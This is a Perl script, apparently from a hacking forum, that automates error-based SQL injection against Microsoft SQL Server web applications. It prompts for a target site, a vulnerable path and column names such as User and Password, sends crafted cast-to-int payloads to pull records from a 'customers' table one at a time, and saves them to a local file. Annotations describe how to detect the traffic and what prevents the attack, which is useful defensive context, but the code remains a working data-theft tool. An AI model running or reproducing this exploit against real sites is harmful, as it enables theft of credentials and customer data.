MSSQL Record Dumper 0.1.1 Alpha.pl
#!/usr/bin/perl
use LWP::UserAgent;
# Start-up banner, written to STDOUT as one list.
print
    "\n ----------------------------- ",
    "\n MSSQL Dumper v0.1.1 ",
    "\n ALPHA ",
    "\n By Illuminatus for h4cky0u ",
    "\n ----------------------------- ",
    "\n";

# State shared by the subs in this file. The HTTP client is created with no
# options, so requests carry LWP's default libwww-perl User-Agent string.
my $ua = LWP::UserAgent->new;

# Index of the column currently being requested; a package global because
# the file runs without strict.
$colcount = 0;
# Prompt on STDIN for every run parameter and keep the answers in package
# globals: $host, $path, $db, $table, $colnum, $colnames/@cols, $rec/@recs
# and $count (the first number of the record range).
# Nothing is validated or encoded; the values are stored exactly as typed.
sub args {
    print "Hostname (e.g www.site.com):";
    chomp($host = <STDIN>);

    print "Path (e.g /products.asp?catid=):";
    chomp($path = <STDIN>);

    print "Database:";
    chomp($db = <STDIN>);

    print "Database table:";
    chomp($table = <STDIN>);

    print "How many columns would you like to dump:";
    chomp($colnum = <STDIN>);

    # Comma-separated column list, split into @cols.
    print "Column names (format: User,Password):";
    chomp($colnames = <STDIN>);
    @cols = split(/,/, $colnames);

    # "first-last" range, split into @recs.
    print "Records to dump (format: 1-23):";
    chomp($rec = <STDIN>);
    @recs = split(/-/, $rec);

    # The record counter starts at the lower end of the range.
    $count = $recs[0];
}
# Fetch one record: for each requested column, send a single GET request over
# plain HTTP and append whatever the response regex captures to output.txt,
# then append the record counter and a newline.
#
# Reads the package globals $host, $path, $db, $count, $colnum, @cols and $ua;
# advances $colcount up to $colnum (the caller resets it). The $table value
# prompted for in args() is not referenced here; the table named in the
# request is the literal "customers".
#
# Defender's view: every request carries the same fixed query-string fragments
# (CHAR(+127+) delimiters, cast(... as int), a trailing Or+3%3d6) and, because
# $ua is built without options, LWP's default libwww-perl User-Agent, so the
# traffic is straightforward to match in web-server or WAF logs. The
# extraction depends on the target concatenating the parameter into SQL and
# returning the database error text in the page; bound parameters and generic
# error pages remove both preconditions.
sub getrecord{
# One request per column of the current record.
while($colcount < $colnum){
# The query fragment is a fixed template; only the column name, the record
# counter and the database name are interpolated, none of them encoded.
my $url = "http://".$host.$path."1+AND+(select+cast(CHAR(+127+)%2b+rtrim(cast((select+ISNULL(cast(".@cols[$colcount]."+as+varchar)%2c'null')+from+(select+top+1+*++from+(select+TOP+".$count."+*+from+".$db."..customers+order+by+1+desc+)+dtable+order+by+1+asc)+finaltable)+as+varchar))%2b+CHAR(+127+)+as+int))+%3d+1++Or+3%3d6";
my $response = $ua->get($url);
# No status check: the body is inspected whatever the HTTP result was.
my $content = $response->content;
# Captures the text between the first "value" and the last "to" on the same
# line (greedy .* without /s). NOTE(review): presumably aimed at SQL Server's
# conversion-error message ("... value '...' to data type int") -- confirm.
if($content =~ m/value(.*)to/) {
# Two-argument open on a bareword handle, return value unchecked; if the open
# fails, the print below writes nothing and no error is reported.
open (RECORDS, '>>output.txt');
# Written with no separator, so consecutive columns run together in the file.
print RECORDS $1;
close (RECORDS);
}
$colcount++;
}
# Close the record's line in output.txt with the record counter.
open (RECORDS, '>>output.txt');
print RECORDS "$count\n";
close (RECORDS);
}
# Driver: collect the run parameters, then walk the record range.
args();

# $recs[1] is the upper bound typed at the "Records to dump" prompt; the
# comparison is strict, so the bound itself is not requested.
while ($count < $recs[1]) {
    getrecord();
    $colcount = 0;    # restart the column walk for the next record
    $count++;
}

print "Records saved to output.txt";